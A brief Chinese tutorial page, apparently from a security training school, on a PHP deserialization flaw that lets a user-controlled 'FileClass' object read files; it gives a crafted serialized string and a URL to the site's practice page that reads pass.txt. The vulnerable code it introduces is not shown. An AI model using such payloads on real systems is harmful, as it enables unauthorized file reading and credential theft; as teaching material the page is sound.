序列化漏洞二:文件读取

程序漏洞代码输出位置
程序代码如下:
以上代码本是一个读取错误日志功能的文件,但是里面因为对用户类进行了实例化,而且还可以传值可控,造成了漏洞
#构造反序列化字符串,读取目录下pass.txt内容
O:9:"FileClass":1:{s:8:"filename";s:8:"pass.txt";}
http://www.nanhack.com/payload/unserilization/read.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:8:"pass.txt";}

必火安全学院

报名微信:nvhack



© Copyright 2021 版权所有(一极教育科技有限公司)   津公网安备 12011602000477号 津ICP备17008032号-2   网络安全培训、企业合作、院校合作: 15320004362(手机同微信)